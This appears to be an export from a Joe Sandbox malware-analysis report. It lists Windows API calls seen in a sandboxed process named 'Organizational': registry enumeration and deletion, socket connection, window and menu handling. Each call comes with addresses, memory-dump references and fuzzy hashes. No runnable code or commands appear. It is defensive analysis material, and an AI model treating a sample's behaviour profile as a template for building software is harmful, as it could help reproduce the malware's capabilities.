                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                    • String ID: 0
                                                    • API String ID: 3866635326-4108050209
                                                    • Opcode ID: 6e665ec95f23593840ebb683e34346e96fe1954fd00af02648cac98eda8341bc
                                                    • Instruction ID: e6f43b00fec7cc4ecf0743846396147ef56a925a990e6a1af7f61632ec32586d
                                                    • Opcode Fuzzy Hash: 6e665ec95f23593840ebb683e34346e96fe1954fd00af02648cac98eda8341bc
                                                    • Instruction Fuzzy Hash: DF416C75A15348EFDB10EF54D884EAABBF5FB05320F04812AEA599B250C730AD50EFA1
                                                    APIs
                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00F71631
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F7165B
                                                    • FreeLibrary.KERNEL32(00000000), ref: 00F71712
                                                      • Part of subcall function 00F71602: RegCloseKey.ADVAPI32(?), ref: 00F71678
                                                      • Part of subcall function 00F71602: FreeLibrary.KERNEL32(?), ref: 00F716CA
                                                      • Part of subcall function 00F71602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F716ED
                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F716B5
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                    • String ID:
                                                    • API String ID: 395352322-0
                                                    • Opcode ID: 42c33168dd0237560439cf4b0adca5b68d37178b0c6c8abe76f5763e08ef49cb
                                                    • Instruction ID: 53907b7c1051ca1c602a9e0fdf995a7d377db74afead44803b57df2a4da6f6f6
                                                    • Opcode Fuzzy Hash: 42c33168dd0237560439cf4b0adca5b68d37178b0c6c8abe76f5763e08ef49cb
                                                    • Instruction Fuzzy Hash: A7313AB190010DBFEB149B94DC89EFEB7BCFF08310F50416AE905A2140EA749E49ABA1
                                                    APIs
                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00F76911
                                                    • GetWindowLongW.USER32(01464A90,000000F0), ref: 00F76944
                                                    • GetWindowLongW.USER32(01464A90,000000F0), ref: 00F76979
                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00F769AB
                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00F769D5
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F769E6
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F76A00
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$MessageSend
                                                    • String ID:
                                                    • API String ID: 2178440468-0
                                                    • Opcode ID: e7f1ba30b783e1f4c647b4737bbc3cea6b8ee6a5ae282e4cfc1dee2754350084
                                                    • Instruction ID: 07b08457c2a2ab07f755cfd4e4f3f3ee2927aa2257f9e420294cb0db142de66b
                                                    • Opcode Fuzzy Hash: e7f1ba30b783e1f4c647b4737bbc3cea6b8ee6a5ae282e4cfc1dee2754350084
                                                    • Instruction Fuzzy Hash: 33313830A046599FDB20DF18DC88F6437E1EB89320F2841A5F608CB2B2CB71EC54EB52
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F4E2CA
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F4E2F0
                                                    • SysAllocString.OLEAUT32(00000000), ref: 00F4E2F3
                                                    • SysAllocString.OLEAUT32(?), ref: 00F4E311
                                                    • SysFreeString.OLEAUT32(?), ref: 00F4E31A
                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00F4E33F
                                                    • SysAllocString.OLEAUT32(?), ref: 00F4E34D
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                    • String ID:
                                                    • API String ID: 3761583154-0
                                                    • Opcode ID: 56e6604cfe5c9cf5137ede2a259cb61f1a0a369881388d0ab95027d9652df67a
                                                    • Instruction ID: 3a855742f0cbebc8631fb472e5e1d95a05bdd5d5f4eab4ecaa4b4dec4f4cd357
                                                    • Opcode Fuzzy Hash: 56e6604cfe5c9cf5137ede2a259cb61f1a0a369881388d0ab95027d9652df67a
                                                    • Instruction Fuzzy Hash: 33217476A0421DAF9B50DFA8DC88DBA7BACFF08360B444125FE14DB250DA70AD85A760
                                                    APIs
                                                      • Part of subcall function 00F68475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00F684A0
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00F668B1
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F668C0
                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00F668F9
                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00F66902
                                                    • WSAGetLastError.WSOCK32 ref: 00F6690C
                                                    • closesocket.WSOCK32(00000000), ref: 00F66935
                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00F6694E
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 910771015-0
                                                    • Opcode ID: 7a9015f529e1a325e96e6a25f49cbd40bf98bf9aecefe779692b60507d7a9114
                                                    • Instruction ID: f9ea7a996c04ef93e4de6920d1dd82443c3a98d0cb066cd6a455f1ccdb05c4eb
                                                    • Opcode Fuzzy Hash: 7a9015f529e1a325e96e6a25f49cbd40bf98bf9aecefe779692b60507d7a9114
                                                    • Instruction Fuzzy Hash: B031B171600208AFDB10AF64CC85FBE77A9EF44721F044129FE05EB2D1CB74AC44ABA1
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F4E3A5
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F4E3CB
                                                    • SysAllocString.OLEAUT32(00000000), ref: 00F4E3CE
                                                    • SysAllocString.OLEAUT32 ref: 00F4E3EF
                                                    • SysFreeString.OLEAUT32 ref: 00F4E3F8
                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00F4E412
                                                    • SysAllocString.OLEAUT32(?), ref: 00F4E420
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                    • String ID:
                                                    • API String ID: 3761583154-0
                                                    • Opcode ID: 3dbf11494d6b0c9b0220edcf9817bbdb1cd02d9823a05d02bf648c4ae528e139
                                                    • Instruction ID: 7f4b92e5842d22cd1b77405e27658d0c519f16bc7b540fd138120b9071c40c04
                                                    • Opcode Fuzzy Hash: 3dbf11494d6b0c9b0220edcf9817bbdb1cd02d9823a05d02bf648c4ae528e139
                                                    • Instruction Fuzzy Hash: E4216536604108AF9B50DFA8DC88DBA7BECFF08370B408525FD05CB260DA75AC85AB64
                                                    APIs
                                                      • Part of subcall function 00EF2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EF214F
                                                      • Part of subcall function 00EF2111: GetStockObject.GDI32(00000011), ref: 00EF2163
                                                      • Part of subcall function 00EF2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EF216D
                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F77C57
                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F77C64
                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F77C6F
                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F77C7E
                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F77C8A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                    • String ID: Msctls_Progress32
                                                    • API String ID: 1025951953-3636473452
                                                    • Opcode ID: 7aabf7a86e5e71a7cd6330dd19a2e740d297e8d70b4da59516432ea7ae9c8f4e
                                                    • Instruction ID: 90cc8a4a1ce9257a15e8be28b51386332a321038b782d67b0c0ee9359b3e8616
                                                    • Opcode Fuzzy Hash: 7aabf7a86e5e71a7cd6330dd19a2e740d297e8d70b4da59516432ea7ae9c8f4e
                                                    • Instruction Fuzzy Hash: 521182B255021DBEEF159F60CC85EE77F5DEF087A8F018115BB08A6090CB729C21EBA4
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00F14282,?), ref: 00F141D3
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00F141DA
                                                    • EncodePointer.KERNEL32(00000000), ref: 00F141E6
                                                    • DecodePointer.KERNEL32(00000001,00F14282,?), ref: 00F14203
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                    • String ID: RoInitialize$combase.dll
                                                    • API String ID: 3489934621-340411864
                                                    • Opcode ID: 9cc7272baac5280444369f35580dc50a19a6874ae8ec383b7f8198f1af03cb91
                                                    • Instruction ID: 440a95a1751303628bc7abd09fe68a33aa33c06ac6f8c83a3a2571e7718215a0
                                                    • Opcode Fuzzy Hash: 9cc7272baac5280444369f35580dc50a19a6874ae8ec383b7f8198f1af03cb91
                                                    • Instruction Fuzzy Hash: 7DE01A71A90709AFEB912B78EC8DBA83664BB51F06FA04524F401E50F0DFB95488BF00
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00F141A8), ref: 00F142A8
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00F142AF
                                                    • EncodePointer.KERNEL32(00000000), ref: 00F142BA
                                                    • DecodePointer.KERNEL32(00F141A8), ref: 00F142D5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                    • String ID: RoUninitialize$combase.dll
                                                    • API String ID: 3489934621-2819208100
                                                    • Opcode ID: 5b12b73368b27510f835d46cea1271f700dbc4dd16634ecda3e43b1448c416ba
                                                    • Instruction ID: ffe8d30876aee2473c8f0d6bc10fbeb59c31d08b67ef24f3b5bdc156ef50920f
                                                    • Opcode Fuzzy Hash: 5b12b73368b27510f835d46cea1271f700dbc4dd16634ecda3e43b1448c416ba
                                                    • Instruction Fuzzy Hash: 44E0B671950B18ABEB91AB64ED4DBD43A68BB40F12F904215F001E51B0CBB89588FF11
                                                    APIs
                                                    • GetClientRect.USER32(?,?), ref: 00EF21B8
                                                    • GetWindowRect.USER32(?,?), ref: 00EF21F9
                                                    • ScreenToClient.USER32(?,?), ref: 00EF2221
                                                    • GetClientRect.USER32(?,?), ref: 00EF2350
                                                    • GetWindowRect.USER32(?,?), ref: 00EF2369
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Rect$Client$Window$Screen
                                                    • String ID:
                                                    • API String ID: 1296646539-0
                                                    • Opcode ID: e0d37380fa69f88838857c610957c73df82991b7a888f4092475f426e3b5c6b1
                                                    • Instruction ID: 955c6082e3c45719821e94949ab65dbeac70008f2465e8eb85a21cc3d05f0a5d
                                                    • Opcode Fuzzy Hash: e0d37380fa69f88838857c610957c73df82991b7a888f4092475f426e3b5c6b1
                                                    • Instruction Fuzzy Hash: 8CB17B7990064EDBDF10CFA8C9807EDB7B1FF08314F149129EE59AB254EB34AA50DB64
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _memmove$__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 3253778849-0
                                                    • Opcode ID: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                    • Instruction ID: 59e3a650ffb15590072259a86a1e666f8b9c617d030709a0e3323df9703b67af
                                                    • Opcode Fuzzy Hash: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                    • Instruction Fuzzy Hash: 0F61CE7160025AABCF11EF60CC82EFE37A4AF45309F444558FE69AB1D2DB399C49EB50
                                                    APIs
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                      • Part of subcall function 00F7147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F7040D,?,?), ref: 00F71491
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F7091D
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F7095D
                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F70980
                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F709A9
                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F709EC
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F709F9
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                    • String ID:
                                                    • API String ID: 4046560759-0
                                                    • Opcode ID: 6101fc39172815dd2e7403d91c31c5dfdbd5710872ef0c3d1c9beb53b965b479
                                                    • Instruction ID: 22b7979fe22d21c156dda33a995469a00ff749b92608dbeb0d65ea9569a31e34
                                                    • Opcode Fuzzy Hash: 6101fc39172815dd2e7403d91c31c5dfdbd5710872ef0c3d1c9beb53b965b479
                                                    • Instruction Fuzzy Hash: 97516931208204EFD710EB64CC85EAABBF9FF84310F04891DF589872A2DB35E905EB52
                                                    APIs
                                                    • GetMenu.USER32(?), ref: 00F75E38
                                                    • GetMenuItemCount.USER32(00000000), ref: 00F75E6F
                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F75E97
                                                    • GetMenuItemID.USER32(?,?), ref: 00F75F06
                                                    • GetSubMenu.USER32(?,?), ref: 00F75F14
                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00F75F65
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountMessagePostString
                                                    • String ID:
                                                    • API String ID: 650687236-0
                                                    • Opcode ID: 45b8ebacf613a465678303c30eec4d0ee8bc4f1ab3f6a4e388b0dba84b7ee61b
                                                    • Instruction ID: 312720d3f1c946cb497080554a4500ac56125b4c60aa1e078db23a0d43b97f49
                                                    • Opcode Fuzzy Hash: 45b8ebacf613a465678303c30eec4d0ee8bc4f1ab3f6a4e388b0dba84b7ee61b
                                                    • Instruction Fuzzy Hash: A951A075E00619AFCF11EF64C845AEEB7B5EF48720F10805AF905BB391CB74AE41AB91
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 00F4F6A2
                                                    • VariantClear.OLEAUT32(00000013), ref: 00F4F714
                                                    • VariantClear.OLEAUT32(00000000), ref: 00F4F76F
                                                    • _memmove.LIBCMT ref: 00F4F799
                                                    • VariantClear.OLEAUT32(?), ref: 00F4F7E6
                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F4F814
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                                    • String ID:
                                                    • API String ID: 1101466143-0
                                                    • Opcode ID: 3864012c9efe730f2046337b542df83ae9d8733ae71dab0fd40360961988bb1f
                                                    • Instruction ID: 5aff75e8661b54f014680dd671a9ae4180ea6c28279b38d9a9b8ae5c8e4d73aa
                                                    • Opcode Fuzzy Hash: 3864012c9efe730f2046337b542df83ae9d8733ae71dab0fd40360961988bb1f
                                                    • Instruction Fuzzy Hash: 54515BB5A00209EFDB14CF58C884AAABBB8FF4C354B15856AED59DB300D734E955CFA0
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F529FF
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F52A4A
                                                    • IsMenu.USER32(00000000), ref: 00F52A6A
                                                    • CreatePopupMenu.USER32 ref: 00F52A9E
                                                    • GetMenuItemCount.USER32(000000FF), ref: 00F52AFC
                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00F52B2D
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                    • String ID:
                                                    • API String ID: 3311875123-0
                                                    • Opcode ID: 60ca0d53fcf6f86029bd6924854c310e7d26369ea9b9ed8a858609051b58fa2c
                                                    • Instruction ID: 51a6e779898ac0ce24e5b461ba7a2349fcb15ce373eaab4a710ee9ba8c815869
                                                    • Opcode Fuzzy Hash: 60ca0d53fcf6f86029bd6924854c310e7d26369ea9b9ed8a858609051b58fa2c
                                                    • Instruction Fuzzy Hash: 2951D470A00309EFCF65CF68C888BAEBBF5EF46325F144219EE119B291D7749948EB51
                                                    APIs
                                                      • Part of subcall function 00EF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00EF29F3
                                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 00EF1B76
                                                    • GetWindowRect.USER32(?,?), ref: 00EF1BDA
                                                    • ScreenToClient.USER32(?,?), ref: 00EF1BF7
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00EF1C08
                                                    • EndPaint.USER32(?,?), ref: 00EF1C52
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
